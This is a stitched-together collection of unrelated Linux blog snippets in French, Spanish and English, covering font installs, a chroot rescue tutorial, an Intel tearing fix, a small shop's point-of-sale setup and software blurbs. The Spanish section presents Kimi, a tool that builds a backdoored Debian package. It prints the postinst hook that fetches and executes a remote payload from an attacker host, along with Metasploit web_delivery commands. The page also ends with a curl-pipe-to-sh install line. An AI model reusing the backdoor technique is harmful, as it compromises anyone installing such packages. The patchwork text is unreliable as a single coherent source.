Il suffit d’installer le paquet fonts-symbola si vous utilisez #stretch

sudo apt-get install fonts-symbola

ou bien de télécharger et installer le .deb de stretch sous #jessie :

wget -O /tmp/fonts-symbola_2.59-1_all.deb http://ftp.fr.debian.org/debian/pool/main/t/ttf-ancient-fonts/fonts-symbola_2.59-1_all.deb
sudo dpkg -i /tmp/fonts-symbola_2.59-1_all.deb

Une plaie...

Ça crains :(


Kimi es un sencillo script escrito en Python para crear un paquete Debian que activará un backdoor en el mismo momento en que la víctima intente instalarlo.


Lo que hace es desplegar un fichero bash en el directorio  “/usr/local/bin/”:

#!/bin/bash
python -c "import urllib2; r = urllib2.urlopen('http://192.168.0.102:8080/SecPatch'); exec(r.read());"  

que se ejecutará inmediatamente al ser llamado mediante el fichero postinst:

#!/bin/bash

chmod 2755 /usr/local/bin/prueba && /usr/local/bin/prueba

Como veis, la llamada es hacia la máquina del atacante que hospeda un payload, que previamente generó un servidor mediante el módulo Web Delivery de Metasploit

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

y generó el payload malicioso con:

sudo python kimi.py -n prueba -l 192.168.0.102 -V 1.0

Finalmente como podéis ver en la siguiente imagen, al instalar el paquete, el atacante obtendrá una sesión sobre la máquina de la víctima:


El proyecto fue hecho para integrarse con Venom Shellcode Generator 1.0.13, pero puede usarse de forma independiente y puede adaptarse para que funcione fácilmente con otro generador de payloads.

Se ha probado en:

- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0

El nombre de la tool proviene de Kimimaro de la serie Naruto
Proyecto: https://github.com/ChaitanyaHaritash/kimi

Aujourd'hui je reviens avec un rapide billet sur l'utilisation de chroot en cas de problème. C'est un petit tutoriel orienté débutant mais ça fait toujours du bien de revoir les bases. Et je l'avoue, je ne me souviens jamais des mount à passer avant de faire un chroot pour être sûr d'avoir accès à tout le matériel correctement. A la base, chroot sert à isoler un processus dans un répertoire mais cette utilisation étant assez rare, je n'ai que OpenVPN et bind qui me viennent en tête quand j'écris ce billet, nous allons l'utiliser pour tout autre chose. Nous allons l'utiliser afin de réparer un problème empêchant le démarrage d'un serveur ou d'un PC. Dans le cas d'un serveur, il faudra booter votre système sur un PXE de secours, ce qui s'appelle rescue-pro par exemple chez OVH. Dans le cas d'un PC, il faudra tout simplement booter sur un liveCD.

Pour commencer on va donc créer un répertoire dans lequel nous allons monter notre répertoire racine. Dans notre cas, on va dire que la racine se trouve sur /dev/md1 (un RAID soft donc) et que notre répertoire d'accueil sera /mnt/chroot:


root@rescue:~# mkdir /mnt/chroot
root@rescue:~# mount /dev/md1 /mnt/chroot

Si vous avez une partition /boot à part, il faut également penser à la monter sur le /boot de votre chroot :


root@rescue:~# mount /dev/md2 /mnt/chroot/boot

Il faut ensuite monter les /dev, /proc et /sys pour avoir accès au matos correctement :


root@rescue:~# mount --bind /dev/ /mnt/chroot/dev
root@rescue:~# mount -t proc /proc /mnt/chroot/proc
root@rescue:~# mount -t sysfs /sys /mnt/chroot/sys

Il ne reste plus qu'à lancer la commande chroot pour se retrouver dans son environnement d'origine sans avoir booter sur l'OS de base :


root@rescue:~# chroot /mnt/chroot /bin/bash
root@rescue:/#

Une fois que vous êtes dans le chroot c'est comme si vous étiez vraiment dans votre système de base. Vous pouvez donc lancez des apt-get, update-grub et autres joyeusetés pour résoudre votre problème vous empêchant de booter. Cela est vraiment très pratique quand on a tout flingué et que l'on veut très rapidement réparer sa boulette 😉 Cela peut-être aussi nécessaire lorsque l'on travaille sur un serveur sans KVM pour voir ce qu'il se passe avant le boot et qu'on veut par exemple, supprimer ce putain de fsck qui s'exécute sur /home qui fait 2To et qui empêche le serveur de remonter pendant 1H... Vous l'avez déjà vécu celui-là je suis sûr. Bref, une fois qu'on a finit de réparer, il suffit de sortir du chroot, de démonter la partition root et de rebooter sur le serveur normalement en croisant les doigts.

I'm putting this here rather than the official tutorials section because I can't guarantee it'll work for everyone .. but it's certainly worked for me on 3 PC's with Intel graphics chips that were using the i915 driver.

This is ONLY for Intel graphics .. do NOT use this for nVidia or AMD/ATI graphics cards.

First check if you do indeed have an intel graphics chip .. open a terminal and run:
Code: [Select]

inxi -G


If that says you have intel graphics hardware and are using the i915 driver, carry on below....

First check you have a screen tearing issue in the first place .. if you see horizontal tearing in this video carry on below:-


The FIX

Open a terminal and run these commands in sequence:
Code: [Select]

sudo apt-get install mesa-utils

then
Code: [Select]

sudo mkdir -v /etc/X11/xorg.conf.d

then
Code: [Select]

echo -e 'Section "Device"\n Identifier "Intel Graphics"\n Driver "Intel"\n Option "AccelMethod" "sna"\n Option "TearFree" "true"\nEndSection' | sudo tee /etc/X11/xorg.conf.d/20-intel.conf

now REBOOT to pick up the changes.   <-- It's IMPORTANT that you reboot to apply the changes


To UNDO

Open a terminal and run:
Code: [Select]

sudo rm -v /etc/X11/xorg.conf.d/20-intel.conf

and REBOOT.

Retour d'XP interessant sur la mise en place d'un POS, article uniquement dispo sur Diaspora
=======================================================================

Dans le cadre d’une récente création de petite entreprise (épicerie) pour une personne proche, j’ai été amené à devoir installer la partie informatique + point de vente.
Je profite de ce dimanche pour faire un petit point sur mes choix quand à la sélection du matériel et de la partie logiciel, ça pourra peut-être inspirer d’autres personnes ou récolter quelques conseils sur des aspects que j’aurai oublié.

FAI:
Pour commencer, niveau FAI, j’ai choisi OVH.
Pas de box TV, adresse IP fixe, 30€/mois, 2x10To de stockage “cloud” (nickel pour les backups), 2 comptes mail, nickel pour une TPE/PME.
J’ai configuré une redirection SSH (en changeant de port externe, j’expliquerais pourquoi dans l’article).
J’ai désactivé la visibilité du SSID pour éviter que des gens essayent et demandent à se connecter : le magasin et l’administrateur système est responsable de tout ce qui sort de la box. On ne connecte pas d’ordinateur inconnu sur un réseau sans bon routeur.

Matériel:
Pour le point de vente, mes objectifs étaient de limiter le budget tout en garantissant une bonne sécurité pour le matériel ainsi que les données et dépendre le moins possible des imprévues externes. A cela s’ajoute la demande d’un écran tactile (et donc d’un logiciel de vente gérant l’écran tactile, j’y reviendrai) ainsi que les accessoires propres à ce genre d’entreprise (tiroir-caisse, imprimante ticket et scanner de produits).
Exit donc les ordinateurs de type Mini PC ou ordinateur de bureau, le mieux étant d’en monter une soi-même.

J’ai donc fait un tri en choisissant au mieux le plus économique tout en garantissant un minimum de qualité :

MSI H81I
Intel Pentium G3240
Corsaire CX430M 80+ bronze
G.Skill NQ Series 4 Go (2x 2Go) DDR3 1600 MHz
WD Caviar Blue 250 Go SATA 6Gb/s
Seagate Barracuda 250 Go 7200 RPM 16 Mo Serial ATA 6 Gb/s (bulk)
Akasa AK-959CU
Advance District
Logitech Desktop MK120
2 câbles SATA
Total ordinateur (hors frais de port) = 424.20€
iiyama T2236MSC-B2
Tiroir-caisse Safescan Light Duty
Epson - C31CD52002 - TM T20II
Lecteur code-barre Prozor
APC Back-UPS BX 950
Total matériel spécifique (hors frais de port) = 681,40€
Il est vrai que ce total peut surprendre pour un point de vente qui ne recquière pas d’une puissance de ouf, le G3240 est clairement surévalué et j’aurai pu me limiter à 2Go de RAM, mais j’ai préféré choisir du matériel qui durera longtemps et qui pourra être facilement recyclé en une machine pour une autre utilisation si toutefois la boutique ferme, ici il suffit d’ajouter une carte-graphique pour en faire une machine de jeux correcte.

J’aurai très bien pu choisir comme solution la location d’un VPS avec le logiciel de vente installé sur celui-ci, les transactions se faisant via Internet, ça aurait clairement pu diminuer le coût matériel (voir même l’annuler, l’ordinateur personnel de la gérante aurait bien pu faire l’affaire), mais comment faire en cas de coupure réseau ?

Pour ce qui est des deux disques durs, j’en ai choisi deux différents pour du RAID 1 : si un modèle d’une marque est défaillant, le deuxième étant d’un modèle et d’une marque différente, il y en auras toujours au moins 1 en fonction en attendant que l’autre revienne du SAV.
J’ai pris en ventilateur CPU en plus parce que je trouve que le ventirad fourni avec le CPU fait trop de bruit, la machine étant placée sous le comptoir dans une petite pièce avec une petite réverbération courte et désagréable il faut que la machine fasse le moins de bruit possible.
Le boitier, franchement, il est nul, mais c’est pas important, ya pas assez de risques pour justifier l’achat d’un boitier plus solide.
Le couple clavier + souris MK120 est de bonne qualité pour de l’entrée de gamme, j’en ai même pris un deuxième pour chez moi.

Pour ce qui est du matériel spécifique, ma plus grande crainte était la compatibilité avec la partie logiciel (Debian 8, j’y reviendrais). N’ayant jamais monté de machine avec ce genre de matériel, il était possible de je sois confronté à des pilotes récalcitrants ou tout autre protocole incompatible, notamment pour le lecteur de code-barre et l’imprimante ticket.
Finalement, je me suis renseigné et il s’est avéré que le lecteur de code-barre se comporte comme un clavier, donc pas de problème à ce niveau là, et pour l’imprimante ticket Epson fourni un pilote compatible CUPS.
D’ailleurs, l’ouverture du tiroir-caisse est assuré par l’imprimante ticket et ses paramètres sont réglables (ouverture en fin d’impression, début d’impression, durée d’impulsion, …).
L’onduleur était obligatoire, APC est une bonne marque et j’ai choisi ce modèle (BX 950) par rapport à l’alimentation de l’ordi (430W).

Bref :

Qualité
Longévité
Sécurité
Polyvalence
Logiciel:
Système d’exploitation:

Je suis libriste, il était donc hors de question d’utiliser quoi que ce soit de propriétaire niveau logiciel, exception faite du pilote Epson de l’imprimante ticket (c’est VRMS qui me l’as dis !).
Je me suis posé la question quand à savoir si je tentais l’installation d’une CentOS ou si je restais en terrain connu : Debian.
Finalement, mes connaissances du système Debian ainsi que Gnome3, seul environnement graphique utilisable avec un écran tactile à ma connaissance (excepté l’écran virtuel qui reste en qwerty, impossible de corriger ça, je l’ai donc désactivé au profit de l’utilisation du clavier physique).

J’ai donc installé une Debian 8 Jessie en RAID 1 et LVM chiffré.

Progiciel de Gestion Intégré:

Il existe plusieurs PGI (ou ERP) open sources “Linux compatible”, j’ai d’abord fait une présélection relativement arbitraire :

Dolibarr
Laurux
Odoo
Openbravo
Tryton
Au départ je m’orientais plus vers Dolibarr.
J’avais entendu de bons retours de la part d’artisants qui bossaient avec et le fait que ce soit une association (du même nom) qui le gère était pour moi et mes convictions un gage de qualité.

Après une installation et quelques essais, je me suis vite rendu compte qu’il n’était pas super simple à utiliser, pas très intuitif pour une personne qui “voulait que ça marche” comme c’était le cas. De plus, le module de point de vente n’était pas utilisable avec un écran tactile ce qui, malheureusement, éliminait d’office Dolibarr :-(
J’ai testé également les autres logiciels, mais je ne me souviens plus pourquoi je ne les aient pas sélectionnés, il me semble que c’est aussi pour la non prise en charge des écrans tactiles… contraiement à Odoo qui, lui, gère l’écran tactile dans son module point de vente.
En plus, j’ai trouvé que sa prise en main était un peu plus intuitive.

J’ai donc jeté mon dévolu sur Odoo 9 bien qu’il soit géré par une entreprise (oui, ça me pose soucis).

Odoo existe en 3 versions : community, online et enterprise.
La version online est éliminée directe pour la même raison que pour le choix du matériel : l’indépendance.
La version enterprise est très chère, surtout pour une TPE (1875€/an) et les modules qu’apportent cette version ne servent à rien dans le cas de la TPE en question.

J’ai donc choisi Odoo 9 community

Exploitation:
Depuis sa mise en production depuis début Août 2016, il n’y a eu aucun soucis majeur aussi bien avec le matériel qu’au niveau logiciel, si ce n’est que le deuxième disque a un taux de “Raw_Read_Error_Rate” ascendant. Ça ne pose pas de soucis pour le moment mais il faut s’attendre à son changement d’ici quelques temps (mois ? années ?). Je n’ai pas jugé utile de le renvoyer au SAV.

Pour le backup, Hubic s’en charge tout les jours d’ouverture à 13h00.
Actuellement je ne sauvegarde que la base de donnée d’Odoo, le minimum, car le stockage n’est pas chiffré et je ne sais même pas si la synchro l’est (http ? https ?), hors de question donc d’envoyer n’importe où le contenu d’une machine entière !
Il existe une solution de chiffrement pour Hubic que je dois mettre en place.

La mise à jour du système et de ses paquets est faite manuellement par l’administrateur système (moi quoi).
En effet, j’ai désactivé les mises à jour automatique car je tiens à avoir un oeil sur les paquets mis à jours et qu’il est fort probable que l’utilisateur ne mette pas à jour ses paquets, ouvrant donc son sytème à des failles de sécurité (et après c’est la faute de l’admin).
Une simple connexion SSH suffit.

Niveau connexion SSH, une astuce pour éviter de se retrouver avec des logs pourris par des tentatives de connexion infructueuses (ou pas, ce qui serait très grave), il convient de changer le port de la box ou du routeur pour un autre que le port 22 (le port externe hein, celui de la machine restant le port 22).
J’ai également installé fail2ban pour plus de sécurité.

Conclusion:
Je pense avoir installé et configuré un point de vente sérieux, solide, économique, sécurisé qui puisse durer plusieurs années sans problèmes, aussi bien au niveau matériel que logiciel.
Le cas échéant, j’ai fait en sorte de limiter le temps de carence en cas de soucis grâce à la configuration RAID 1, au chiffrement (en cas de cambriolage) ainsi que le backup régulier de la base de donnée du logiciel de vente.
Il me reste encore à installer une politique de backup de la machine, pour cela je dois paufiner l’utilisation de Backuppc.

Après sa prise en main, l’utilisateur n’as rencontré aucun soucis avec Odoo si ce n’est l’impossibilité d’éditer des factures… enfin un truc dans le genre, je ne me souviens plus exactement de ce qu’il manque, mais quoi qu’il en soit ça n’empêche pas la vente et la bonne tenue des comptes.

#linux #commerce #pos #vente #hubic #ovh #administration #adminsys #sécurité #tpe #pme #odoo #debian

Studiobox est un système GNU/Linux, installable sur clé usb ou sur PC. Il permet de disposer, en quelques secondes, d’une multitude d’outils multimédias libres : montage audio et vidéo, extraction de cd ou de DVD, encodage, diffusion radio et TV, etc.

C’est donc un véritable couteau suisse du multimédia, portable, libre et performant !

Flowblade is a multitrack non-linear video editor released under GPL3 license. From beginners to masters, Flowblade helps make your vision a reality of image and sound.

curl https://raw.githubusercontent.com/stylersnico/nanorc/master/install.sh | sh